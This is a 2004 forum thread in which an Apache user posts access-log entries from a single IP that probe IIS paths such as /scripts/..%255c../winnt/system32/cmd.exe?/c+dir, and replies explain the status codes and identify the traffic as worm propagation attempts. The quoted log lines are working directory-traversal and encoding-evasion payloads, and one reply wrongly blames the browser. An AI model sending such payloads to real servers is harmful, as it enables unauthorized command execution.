Access log file.

I looked in my access log file and found this

62.220.119.12 - - [24/Feb/2004:02:19:35 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
62.220.119.12 - - [24/Feb/2004:02:19:37 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
62.220.119.12 - - [24/Feb/2004:02:19:39 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
62.220.119.12 - - [24/Feb/2004:02:19:40 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310

Has anyone seen this before, i am using Apache server. I see that there are some files that have 404 (error) but 400 what does that mean. Could someone please lend a helping hand on this.

Thank You
Kevin

400 means bad request.

Ok what more information would you need, maybe it was something i was doing on here, have been working on getting mySql to work right. Not sure why this is in access log. I here is everything that is in log

62.220.119.12 - - [24/Feb/2004:02:19:05 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288
62.220.119.12 - - [24/Feb/2004:02:19:06 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286
62.220.119.12 - - [24/Feb/2004:02:19:11 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
62.220.119.12 - - [24/Feb/2004:02:19:13 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
62.220.119.12 - - [24/Feb/2004:02:19:15 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
62.220.119.12 - - [24/Feb/2004:02:19:20 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
62.220.119.12 - - [24/Feb/2004:02:19:22 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
62.220.119.12 - - [24/Feb/2004:02:19:23 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343
62.220.119.12 - - [24/Feb/2004:02:19:25 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
62.220.119.12 - - [24/Feb/2004:02:19:30 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
62.220.119.12 - - [24/Feb/2004:02:19:32 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
62.220.119.12 - - [24/Feb/2004:02:19:33 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
62.220.119.12 - - [24/Feb/2004:02:19:35 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
62.220.119.12 - - [24/Feb/2004:02:19:37 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
62.220.119.12 - - [24/Feb/2004:02:19:39 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
62.220.119.12 - - [24/Feb/2004:02:19:40 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
As you can see by the times all within minutes or seconds of each other.

Is this the access log or the error log? I see nothing but error messages in the file.

I picked two lines from the log:


The not found error comes because the requested file couldn't be found. But notice the difference in the GET request. 404 is produced with ..%25%35%63 and 400 comes when the request was %%35c (notice the two %-charactersm although I'm not sure if those are the source of the error.)

The real source of the error might also be on the software that makes the GET request, in other words the browser. I'm no guru at HTTP, so I'll leave this for someone more experienced.

What that is - is Microsoft worms accessing your server to try an propagate.

Is this the only IP, its from a block from Tehran, Iran and as noted, quite possible a virus. I'd block the IP at your firewall and any others with similar log actipns.